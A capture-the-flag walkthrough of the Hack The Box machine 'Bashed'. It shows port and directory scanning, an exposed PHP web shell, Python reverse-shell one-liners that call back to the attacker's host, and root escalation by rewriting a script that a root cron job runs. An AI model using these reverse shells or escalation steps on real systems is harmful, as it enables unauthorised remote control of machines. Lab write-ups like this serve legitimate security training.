HTB - Bashed

Getting Root:
Start with nmap and noticed that port 80 is the only port opened
Using gobuster we discover a directory called /dev which contains a phpwebshell
We get a reverse shell using python
Simple enumeration shows we can execute any commands as scriptmanager
Used sudo -u to become scriptmanager and create a reverse shell script in python which gets executed by root every 1 minute.
Nmap
# Nmap 7.80 scan initiated Mon Mar 2 12:37:01 2020 as: nmap -sC -sV -p- -oA nmap/Bashed 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.040s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Gobuster
gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php -o Bashed_gobuster.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.68
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/03/02 12:50:38 Starting gobuster
===============================================================
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/images (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/config.php (Status: 200)
/fonts (Status: 301)
/server-status (Status: 403)
===============================================================
2020/03/02 12:56:42 Finished
===============================================================
Gobuster discovered a directory named /dev which includes a phpwebshell.


Getting a Reverse Shell
Using a python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Started the listener
rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 57102
/bin/sh: 0: can't access tty; job control turned off
$
Improving the shell
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege Escalation
Using linpeas.sh, the following is very interesting: linpeas.sh GitHub: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
[+] Testing 'sudo -l' without password & /etc/sudoers
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
That means we can run any command as user scriptmanager
www-data@bashed:/dev/shm$ sudo -u scriptmanager whoami
sudo -u scriptmanager whoami
scriptmanager
www-data@bashed:/dev/shm$
www-data@bashed:/dev/shm$ sudo -u scriptmanager id
sudo -u scriptmanager id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
www-data@bashed:/dev/shm$
www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/dev/shm$
scriptmanager@bashed:/dev/shm$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
The user scripmanager can access the /scripts directory (this shows on the linpeas.sh but www-data couldn't access it)
# output from linpeas.sh
[+] Interesting writable Files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/dev/shm/linpeas.sh
/run/lock
/scripts
/scripts/test.py
There are two files there. It seems like something is executing the test.py
script with root privileges because if you mv test.txt test.bkp
, after some time, the file gets created again and is owned by root.
# File named test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
# File named test.txt OWNED by root!!! (huh??)
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!scriptmanager@bashed:/scripts$
# These are the file permissions
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Mar 2 12:04 . │| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
drwxr-xr-x 23 root root 4096 Dec 4 2017 .. │| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
-rwxr--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py │| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
-rw-r--r-- 1 root root 12 Mar 2 11:07 test.txt
You can modify the test.py
script (this script is owned by user scriptmanager, which is our user) and see if you can get a reverse shell with root privileges. As you can see below, I reused the same exact reverse python shell I used to get user but this time I changed the formatting a little bit.
#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.20",9002))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
We get a shell as root
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 59522
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# python -c 'import pty;pty.spawn("/bin/bash")'
Investigating a little bit into what was executing the test.py
on the /scripts
directory, we noticed that root had a cron job running which executes all python scripts every minute
root@bashed:/scripts# crontab -l
crontab -l
* * * * * cd /scripts; for f in *.py; do python "$f"; done
If you want to learn a little bit more about crontab, check out this site below:
Last updated